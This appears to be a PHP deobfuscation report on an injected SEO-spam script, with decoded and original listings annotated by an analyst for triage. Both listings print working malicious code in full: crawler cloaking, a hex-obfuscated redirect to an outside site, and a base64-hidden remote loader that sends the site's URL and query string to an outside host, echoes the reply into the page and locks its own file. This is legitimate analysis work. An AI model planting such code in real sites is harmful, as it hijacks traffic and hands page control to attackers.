
PHP Decode

->|<?php header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGEN..

Decoded Output

->|<?php 
// Analyst note: cloaking branch of an injected SEO-spam script. The branch is
// selected by the User-Agent request header, so a search-engine crawler and an
// ordinary browser can receive different output from the same URL. Fetching the
// page with a crawler User-Agent and with a browser User-Agent and comparing
// the two responses is a quick way to confirm this behaviour on a suspect host.
header('Content-Type:text/html;charset=gb2312'); 
$key= $_SERVER["HTTP_USER_AGENT"]; 
// strpos() is case-sensitive; matching 'oogle' / 'aidu' without the first
// letter presumably lets one test cover both capitalisations of each crawler name.
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false) 
{ 
   // URL of this script built from server variables; $host_name is not
   // referenced again anywhere in the visible listing.
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; 
   // NOTE(review): the right-hand side of this assignment is missing from the
   // listing as captured, so the statement is incomplete as shown and the
   // crawler-only content cannot be determined from this page.
   $file =  
 
   echo $file; 
} 
 
?> 
<script LANGUAGE="Javascript"> 
// Analyst note: client-side referrer redirect. document.referrer is read and,
// when "google", "baidu" or "sogou" occurs in it at an index greater than 0,
// the browser is sent to the hard-coded external address below.
// A visitor with an empty referrer (URL typed directly or opened from a
// bookmark) does not match, so the page looks normal on a direct visit.
// When triaging, request the page with a search-engine Referer header set.
var JdsilflN_1=window["document"]["referrer"] 
if(JdsilflN_1["indexOf"]("google")>0 || JdsilflN_1["indexOf"]("baidu")>0 || JdsilflN_1["indexOf"]("sogou")>0 ) location["href"]="http://um8868.com/"; 
</script><?php 
// Analyst note: remote content loader. On every request this section makes an
// outbound HTTP call to a base64-hidden endpoint and echoes the response into
// the page, so whoever controls that endpoint controls the markup served from
// this host. Outbound web-server requests to the decoded host and PHP files
// unexpectedly set to mode 0444 are usable indicators when hunting for copies.
// Removes the execution time limit for this request.
set_time_limit(0); 
$url1 = $_SERVER['PHP_SELF'];   
// Everything after the last '/' of the script path, i.e. this file's own name.
$name= substr($url1 ,strrpos($url1 ,'/')+1 ); 
// Marks the file read-only for all users; '@' hides any failure. The path is
// relative, so it resolves against the current working directory (presumably
// the script's own directory — confirm for the SAPI in use).
@chmod($name,0444); 
header("Content-Type: text/html;charset=gb2312"); 
date_default_timezone_set('PRC'); 
// Decodes to hxxp://cdn8[.]0471pk[.]com (defanged here); the base64 wrapping
// keeps the host name out of a plain-text search of the file.
$a = base64_decode("aHR0cDovL2NkbjguMDQ3MXBrLmNvbQ=="); 
// The literal decodes to "http://"; $b becomes this page's own URL as built
// from the client-supplied Host header and the script path.
$b = base64_decode("aHR0cDovLw==") . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; 
// The middle literal decodes to "/index.php?host=". The request therefore
// reports the infected URL, the raw query string and the server name to the
// remote host over plain HTTP; none of the values are URL-encoded.
// file_get_contents() on an http:// URL depends on allow_url_fopen being
// enabled, so disabling that setting where it is not needed blocks this fetch.
$c = file_get_contents($a . base64_decode("L2luZGV4LnBocD9ob3N0PQ==") . $b . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
// Response body is written to the page verbatim, with no validation or escaping.
echo $c; 
?>|<- 
0 


Original Code

->|<?php
// Analyst note: User-Agent cloaking. Output inside the branch below is sent
// only when the request's User-Agent contains 'oogle' or 'aidu', so crawlers
// and ordinary browsers can see different content at the same URL.
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
// Case-sensitive substring tests; dropping the first letter presumably covers
// both capitalisations of each crawler name.
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   // Self-URL from server variables; not used again in the visible listing.
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   // NOTE(review): the value assigned here is absent from the listing as
   // captured; the statement is incomplete as shown.
   $file = 

   echo $file;
}

?>
<script LANGUAGE="Javascript">
// Analyst note: the \xNN string escapes are plain hex-encoded ASCII used to
// keep the property names and the destination out of a text search. They
// decode to: document, referrer, indexOf, google, baidu, sogou, href and the
// redirect address http://um8868.com/ (also visible in the decoded listing).
// Effect: a visitor whose referrer contains one of the three search-engine
// names at an index greater than 0 is redirected; a direct visit is not.
var JdsilflN_1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if(JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65")>0 || JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75")>0 || JdsilflN_1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75")>0 ) location["\x68\x72\x65\x66"]="\x68\x74\x74\x70\x3a\x2f\x2f\x75\x6d\x38\x38\x36\x38\x2e\x63\x6f\x6d\x2f";
</script><?php
// Analyst note: remote content loader. Each request triggers an outbound HTTP
// fetch to a base64-encoded endpoint, and the response is echoed into the page
// unmodified, which hands control of the served markup to that remote host.
// Removes the execution time limit for this request.
set_time_limit(0);
$url1 = $_SERVER['PHP_SELF'];  
// File name portion of the script path (text after the last '/').
$name= substr($url1 ,strrpos($url1 ,'/')+1 );
// Sets this file to read-only (0444) with errors suppressed by '@'; the
// relative path resolves against the current working directory.
@chmod($name,0444);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
// Decodes to hxxp://cdn8[.]0471pk[.]com (defanged here).
$a = base64_decode("aHR0cDovL2NkbjguMDQ3MXBrLmNvbQ==");
// The literal decodes to "http://"; $b is this page's URL from the Host header
// and the script path.
$b = base64_decode("aHR0cDovLw==") . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
// The middle literal decodes to "/index.php?host=". The infected URL, raw query
// string and server name are sent to the remote host without URL-encoding.
// The fetch requires allow_url_fopen; turning it off where unused blocks it.
$c = file_get_contents($a . base64_decode("L2luZGV4LnBocD9ob3N0PQ==") . $b . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
// Remote response is emitted verbatim.
echo $c;
?>|<-
0

Function Calls

None

Variables

None

Stats

MD5 8dbac3eae591a252263e1681f44e543b
Eval Count 0
Decode Time 84 ms